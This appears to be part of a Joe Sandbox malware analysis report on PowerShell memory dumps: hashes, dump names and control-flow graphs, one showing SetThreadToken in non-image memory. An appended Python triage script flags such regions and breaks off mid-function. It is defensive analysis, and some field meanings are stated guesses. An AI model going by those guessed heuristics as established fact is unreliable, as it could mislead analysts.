• Opcode Fuzzy Hash: 63d9ecb817b09ab14dbd68fed2de4f32ef6b950d0700eff73f482c5826b9a6a3
• Instruction Fuzzy Hash: E6F0A43171D3A15FD7118A7A9C509BBBFE9EFC6650B0840AAF444CB262DAB0DD048BA0
Memory Dump Source
• Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d8ec35d84b37e6177d71bc3a09a99126024336ff3d9af357b9537ebdaeddc93b
                                                                                                                                                                                                                          • Instruction ID: 77f826ca6816bab50587c65399660d410404ec9c5292e0b513a535f295083788
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8ec35d84b37e6177d71bc3a09a99126024336ff3d9af357b9537ebdaeddc93b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401F771504304ABE7104F36DC80B67BF9CDF41A26F18C199EC180B242C378B441CBB1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7676f419e8bb822b430821d7ef72e32fb911789d94177c8e0d07ff03fd698f34
                                                                                                                                                                                                                          • Instruction ID: affcc4a54218af3a44e5b222e86101df143a4678ced2ab28ecb5e5c55f983d34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7676f419e8bb822b430821d7ef72e32fb911789d94177c8e0d07ff03fd698f34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E0126B2604340DFE312AB79C4043AB7BA5EBC2325F5480DAC5144B296CF397846C7B0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2f19af051e6ae5975be3f496856d3f000f059b6350bd464f3126f9f4a471cfd7
                                                                                                                                                                                                                          • Instruction ID: fc10f6d147987f0669a58c25aeeaf84973b827953eda601a08db919206c166f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f19af051e6ae5975be3f496856d3f000f059b6350bd464f3126f9f4a471cfd7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91111771D0078AEBCB14DFE5C9005ADFBB0FFD9350F14471AE025AA645EBB126868B80
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2029c09fb269df597006624a42027bba6c8e3f4504f04fd8bf1523d0951b10b3
                                                                                                                                                                                                                          • Instruction ID: 7ff94875a4515992fab3befc187303dbf546f81be98b3a77aebdac078e5275a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2029c09fb269df597006624a42027bba6c8e3f4504f04fd8bf1523d0951b10b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F0F4311043455FE311A739D48096ABBA5EFC226A71986BEC5498F225DB356C09C761
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3e24b7b5eeaceee24abaab8e73141480f3caef43db612a9d4a4162abc4adf9f2
                                                                                                                                                                                                                          • Instruction ID: 5a3eda22d706309214cb4e4177cb7501fd46adc2e937d2b2cd72ead88eec2fb5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e24b7b5eeaceee24abaab8e73141480f3caef43db612a9d4a4162abc4adf9f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F0F6352052445FD7119B6AE840ABFBBE5EFC9225B00055DD189C3391CF246845C7A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3b7aaff5d652c48a3d18eb9d1849a82666fa26fc673e473ba325eeeb6f66a073
                                                                                                                                                                                                                          • Instruction ID: bd45ce6c49e0bcf40e3cb09c042f8c734badbf5aa3923235d12c618c1d62261d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b7aaff5d652c48a3d18eb9d1849a82666fa26fc673e473ba325eeeb6f66a073
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF0BB3110D3C05FD316A33AD89056E7FE5DDC646131945EFC84ACF651CB295805873A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f2f6e5c46235f7b933dee6560046db662b3ea3432345f25840288f8c0cf8a20c
                                                                                                                                                                                                                          • Instruction ID: 58641b18be2f1f7877d4aa1007343df85b3f41a07122fed790d3b709b936f697
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f6e5c46235f7b933dee6560046db662b3ea3432345f25840288f8c0cf8a20c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF0E776600600AF97248F0AD985C27FBADEFD4674719C5AAE84A4B612C671FC41CAA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7e7c2d4204adc2efd35eb68f4ad4f06af1cba1000d1f3d5e117a6b1003660b41
                                                                                                                                                                                                                          • Instruction ID: 658b06e5eee6a9e5c5a47b28b80d5fd321501d8f7627572d486310674208ae06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e7c2d4204adc2efd35eb68f4ad4f06af1cba1000d1f3d5e117a6b1003660b41
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF082393042418FC7108F19D898C76BBFAEFCA61531914E9E584CB736DB61EC01CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ad1ab265029c00703431911c7e45676342fc236453aaffc7386ae9f8311f57d3
                                                                                                                                                                                                                          • Instruction ID: b06b9fd214b7a1a2d4e4261b8aae7ca112dbf0d63f2f7919fd35eaee1b265a26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1ab265029c00703431911c7e45676342fc236453aaffc7386ae9f8311f57d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11F0B4719093409FE3608B79D49C39EBFE4EB42350F04849DD14DC7283DB3678848751
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 513bf41c120c6f92bd82023d77eb05697e97a455b238f401ac30e9a292419371
                                                                                                                                                                                                                          • Instruction ID: f4d8e7fa954f9a6206a03a1c519a8f594780841e58ad6a48deda65909ad833cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 513bf41c120c6f92bd82023d77eb05697e97a455b238f401ac30e9a292419371
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E0D831718710A7DB0D3776A40C2AEBA96EBC4725F04402EEA0A83346CF796812C3D5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e762f6e53ed4918449cb8d52e8cba41861a773f1dd28a8c73a5667ac7ef9641f
                                                                                                                                                                                                                          • Instruction ID: 402a87e983333f8d399c146c5638b8ff274817a2e63607622d41033d4bb05dcf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e762f6e53ed4918449cb8d52e8cba41861a773f1dd28a8c73a5667ac7ef9641f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBE022313043215B83016B2E9848015BBF9EAD961231840BFED49C7262CA14EC218BE9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 65b75743a7b41bc495f6b63b7e12e1a0c4c8af832eee65c605cc62cfffbff5a1
                                                                                                                                                                                                                          • Instruction ID: 2ea8f1a24bde14ccc215df91c1bda0061ef0383e0ababea37706f6b240c51acd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b75743a7b41bc495f6b63b7e12e1a0c4c8af832eee65c605cc62cfffbff5a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E0D830815349CFCB55BBB7D4494BDFF30EA51201B0041EDC51397186EB31659ACBC1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bd6fcac9f9ef8592470803ac7597a138b719af5003051fb218e2c5276d141412
                                                                                                                                                                                                                          • Instruction ID: 5cbe35f533619b3dabc51192f6b2c275947939947ca9fc03af45d9be5b7f55cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd6fcac9f9ef8592470803ac7597a138b719af5003051fb218e2c5276d141412
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEF06D709003049BD3A49FB9D49C39ABBE5EB44350F00446DD51EC3341DB3A68848B90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e71aed7a21ce76263404650dad9cffa37cae9b22ac684bb7ec5c981de7d1a926
                                                                                                                                                                                                                          • Instruction ID: abc9bb93892e2fe811c99508f433a601732db1b1eff3aecade111ff6a275f05b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e71aed7a21ce76263404650dad9cffa37cae9b22ac684bb7ec5c981de7d1a926
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04E02631308310A7CB0C3779A40C2AEBA9AEBC4729F04402EDA0683386CF78281283D5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2f56c79c5fbffc7aa1c8ed0f9eefad9e6109ffa9345989c32978ae0667371d9b
                                                                                                                                                                                                                          • Instruction ID: 9192b072c93c2a88b2f32587833b6fb821fba2a020fa1b1d77ba294c9391c5cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f56c79c5fbffc7aa1c8ed0f9eefad9e6109ffa9345989c32978ae0667371d9b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD0A753B41661175A6475FF19006BBA6CECFC55A970501BADA09C3342EF40FC0643F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction ID: ef6bcb24fbb507cee56b5ef3ab7f4beacfeae48b4297225ee1b96af037211b7d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE08631B10014978B08995AD4144FDF7AEDBCC221F04C47AD90AA7340DB72691596E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3a382b29379ae9a73fd2ee4c4b67adc0abd60ea11358542f72fe590cade285dd
                                                                                                                                                                                                                          • Instruction ID: 684aac31ff120a989e8e8324882da21b26279b3498feaaf30292b38e6b2bb369
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a382b29379ae9a73fd2ee4c4b67adc0abd60ea11358542f72fe590cade285dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE09A31E1874A8B8765EB65D44297EFBF1EB95305B0484A8DE45AB246EB306892CB80
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 34aacc0568270f115ef38e7048be2e127a9dc6969dafeb4f66cc4bc9aae4a36d
                                                                                                                                                                                                                          • Instruction ID: cddabc310d7ee05a28724768d038dadf84c93a1c01ed2353878b50ffc306db85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34aacc0568270f115ef38e7048be2e127a9dc6969dafeb4f66cc4bc9aae4a36d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5E01A70E4424A9F8B80DF7D88415ADFFF0EB89240B5485AEC519D6211E3329611CB81

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:7.1%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 21761 8b87478 21762 8b874bb SetThreadToken 21761->21762 21763 8b874e9 21762->21763

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 202 4b6b490-4b6b4b9 203 4b6b4be-4b6b7f9 call 4b6aab4 202->203 204 4b6b4bb 202->204 265 4b6b7fe-4b6b805 203->265 204->203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: kUKn^${UKn^$[Kn^
                                                                                                                                                                                                                          • API String ID: 0-1042817059
                                                                                                                                                                                                                          • Opcode ID: f25e3fb1deb43c0a7cdc90e408d00964241ca82ee43c42ec37f3b22c7d3a9a58
                                                                                                                                                                                                                          • Instruction ID: 73961a20f28b86e705589d84adecb65c4e738fde81559a7ebf3d03e0e9aa1584
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25e3fb1deb43c0a7cdc90e408d00964241ca82ee43c42ec37f3b22c7d3a9a58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E917271B00715DBEB25EFB498105AE7BF2EFC4604B04896DD906AB340DF39AE068BD5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 266 4b6b4a0-4b6b4b9 267 4b6b4be-4b6b7f9 call 4b6aab4 266->267 268 4b6b4bb 266->268 329 4b6b7fe-4b6b805 267->329 268->267
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: kUKn^${UKn^$[Kn^
                                                                                                                                                                                                                          • API String ID: 0-1042817059
                                                                                                                                                                                                                          • Opcode ID: 42184a1da02f2cd805a711ccca62aa29d9336289780408441d5bf2a5aae9c657
                                                                                                                                                                                                                          • Instruction ID: 060029f7df6619ac6a46a3f1d3782d01acde83ba162f7e59ffc211de6914ff0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42184a1da02f2cd805a711ccca62aa29d9336289780408441d5bf2a5aae9c657
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56916371B00715DBEB25EFB498105AE7BF2EFC4604B04892DD916AB340DF39AE068BD5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl$Jl$Jl$Jl$Jl$Jl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-685953168
                                                                                                                                                                                                                          • Opcode ID: 8e24c26b52a7ba1ef86f37a2c1bfff2973a10c5f530ab8ecd62a9eed06e5d77c
                                                                                                                                                                                                                          • Instruction ID: fc5d0e2a32ec43fb628dfd2bd246d215fc045a5c4ed2300d80596f1e91e525ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c26b52a7ba1ef86f37a2c1bfff2973a10c5f530ab8ecd62a9eed06e5d77c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D12205B1B0030ACFDB24EF6884417AABBF5BF89215F14847AD945CB291DB31D861C7A1

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 493 8b87470-8b874b3 494 8b874bb-8b874e7 SetThreadToken 493->494 495 8b874e9-8b874ef 494->495 496 8b874f0-8b8750d 494->496 495->496
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_8b80000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 5bd2677b0c21d8019a7525a0e7c8cac36cba9fb3345b55ee4f439c12664740dd
                                                                                                                                                                                                                          • Instruction ID: 8bc821ad229e52304669bed0c19c223a25307ae15734c915fa53def2069f49cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bd2677b0c21d8019a7525a0e7c8cac36cba9fb3345b55ee4f439c12664740dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B41134B58003498FDB10DFAAC884B9EFFF4AF88224F248459D458A7210C774A844CFA5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 499 8b87478-8b874e7 SetThreadToken 501 8b874e9-8b874ef 499->501 502 8b874f0-8b8750d 499->502 501->502
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_8b80000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: f27651a19e22aacc17ac83a5ee56d63ef7540c0f9af4600dcd0d50ea271de1f0
                                                                                                                                                                                                                          • Instruction ID: 7c7b3a2d7847388ce7b9dd0ea1a09ed799b1fbe88ea06e35f6d49906f36da42a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27651a19e22aacc17ac83a5ee56d63ef7540c0f9af4600dcd0d50ea271de1f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB1106B59003098FDB10DF9AD884B9EFFF8EF88624F248459D558A7350CB74A944CFA5
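The graph lines and .sdmp dump names printed in these entries are compact enough to triage by hand once, but not across a whole report. The following Python is an added example and is not part of the Joe Sandbox report or its IDA plugin. It parses the report's own edge-list notation (node id, address or address range, an optional "call <target>" or API name, then "a->b" edges) and the dump file name, and flags a region when a node in it calls SetThreadToken, the region is marked "based on PE: false", and the name decodes to private PAGE_EXECUTE_READWRITE memory. The node and edge token meanings are inferred from the graph lines above; the dump-name layout is taken from the page where it can be checked (first field 0x0D = process 13 and fourth field 08B80000 match the snapshot name hcaresult_13_2_8b80000_powershell.jbxd and the printed Offset), while reading the fifth field as the Windows page protection and the seventh as the memory type is an assumption, as is the triage rule itself.

```python
"""Added example, not part of the Joe Sandbox report or its IDA plugin: parse the
report's control_flow_graph / execution_graph edge lists and its .sdmp dump file
names, then flag non-image RWX private regions whose code calls SetThreadToken."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Documented Windows memory protection and type constants (MEMORY_BASIC_INFORMATION).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                 # "493->494"
_ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")     # "8b874bb" or "8b874bb-8b874e7"


@dataclass
class Node:
    nid: int
    start: int
    end: Optional[int] = None                  # execution_graph nodes carry one address
    calls: list = field(default_factory=list)  # "call <hex>" targets inside the dump
    apis: list = field(default_factory=list)   # symbolic API names, e.g. SetThreadToken


def parse_graph(text: str):
    """Parse '<kind> <id> <addr>[-<addr>] [call <hex> | ApiName]... <a>-><b>...'.
    Token meanings are inferred from the graph lines printed in the report."""
    toks = text.split()
    kind, nodes, edges, cur, i = toks[0], {}, [], None, 1
    while i < len(toks):
        t = toks[i]
        if (m := _EDGE_RE.match(t)):
            edges.append((int(m[1]), int(m[2])))
            cur = None
        elif t.isdigit() and i + 1 < len(toks) and _ADDR_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = nodes[int(t)] = Node(int(t), int(lo, 16), int(hi, 16) if hi else None)
            i += 1
        elif t == "call" and cur is not None:
            cur.calls.append(int(toks[i + 1], 16))
            i += 1
        elif cur is not None:
            cur.apis.append(t)
        i += 1
    return kind, nodes, edges


def parse_sdmp_name(name: str) -> dict:
    """Decode a dump name like
    0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp
    Field 0 (0x0D = 13), field 1 (2) and field 3 (08B80000) match the report's own
    'hcaresult_13_2_8b80000_powershell.jbxd' and 'Offset: 08B80000'.  Reading field 4
    as the page protection and field 6 as the memory type is an assumption."""
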